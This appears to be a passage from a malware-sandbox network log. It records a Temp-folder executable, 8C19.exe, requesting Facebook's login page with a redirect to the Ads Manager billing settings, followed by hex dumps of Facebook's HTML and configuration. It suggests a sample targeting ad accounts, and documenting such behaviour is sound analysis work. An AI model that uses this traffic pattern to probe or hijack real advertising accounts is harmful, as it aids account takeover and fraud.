                                                                                                                                  2192.168.2.549699157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:01 UTC222OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:01 UTC223INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:01 UTC224INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:01 UTC226INData Raw: 63 65 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 78 46 67 69 6a 41 33 64 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce26<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="xFgijA3d">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                  2022-10-17 20:07:01 UTC228INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:01 UTC229INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:01 UTC230INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 4c 36 45 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 51 39 51 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 62 6d 38 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 6f 59 38 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmL6E"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFQ9Q"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtbm8"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwqoY8"},"3752":{"result":false,"hash":"AT6eS5UTk
                                                                                                                                  2022-10-17 20:07:01 UTC232INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:01 UTC233INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 33 37 38 36 37 38 35 37 32 32 38 37 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575378678572287","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:01 UTC235INData Raw: 53 49 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54
                                                                                                                                  Data Ascii: SINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISIT
                                                                                                                                  2022-10-17 20:07:01 UTC236INData Raw: 61 53 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b
                                                                                                                                  Data Ascii: aStoreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[
                                                                                                                                  2022-10-17 20:07:01 UTC238INData Raw: 6a 4a 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 75 66 64 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72
                                                                                                                                  Data Ascii: jJfeKprlUUO1QS0oEqZufd","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkEr
                                                                                                                                  2022-10-17 20:07:01 UTC239INData Raw: 6f 6e 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22
                                                                                                                                  Data Ascii: ons_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/"
                                                                                                                                  2022-10-17 20:07:01 UTC241INData Raw: 72 74 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: rter\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1
                                                                                                                                  2022-10-17 20:07:01 UTC242INData Raw: 65 74 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 32 31 31 39 34 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 31 31 35 31 2e 37 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 31 31 35 31 2e 37 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22
                                                                                                                                  Data Ascii: eturn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037221194,"timeOfRequestStart":1666037221151.7,"timeOfResponseStart":1666037221151.7},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id"
                                                                                                                                  2022-10-17 20:07:01 UTC244INData Raw: 76 33 34 37 6b 37 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 33 4e 67 57 52 59 4e 76 7a 58 51 77 31 65 62 43 49 32 78 6a 54 6a 36 30 66 38 4d 6b 5f 61 53 69 4e 36 32 74 67 6f 39 72 4c 64 76 45 6f 41 62 30 4f 35 34 36 4b 43 58 51 37 69 6f 77 33 46 2d 66 73 71 79 33 55 44 47 30 5a 47 73 34 67 6f 62 77 61 76 33 34 37 6b 37 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75
                                                                                                                                  Data Ascii: v347k7SQ"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa3NgWRYNvzXQw1ebCI2xjTj60f8Mk_aSiN62tgo9rLdvEoAb0O546KCXQ7iow3F-fsqy3UDG0ZGs4gobwav347k7SQ"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlu
                                                                                                                                  2022-10-17 20:07:01 UTC245INData Raw: 6f 75 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a
                                                                                                                                  Data Ascii: ouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":
                                                                                                                                  2022-10-17 20:07:01 UTC247INData Raw: 39 61 78 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 78 46 67 69 6a 41 33 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 32 31 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f
                                                                                                                                  Data Ascii: 9ax- _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="xFgijA3d">requireLazy(["bootstrapWebSession"],function(j){j(1666037221)})</script><div class="_li" id="u_
                                                                                                                                  2022-10-17 20:07:01 UTC248INData Raw: 6f 66 66 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f
                                                                                                                                  Data Ascii: off" id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_
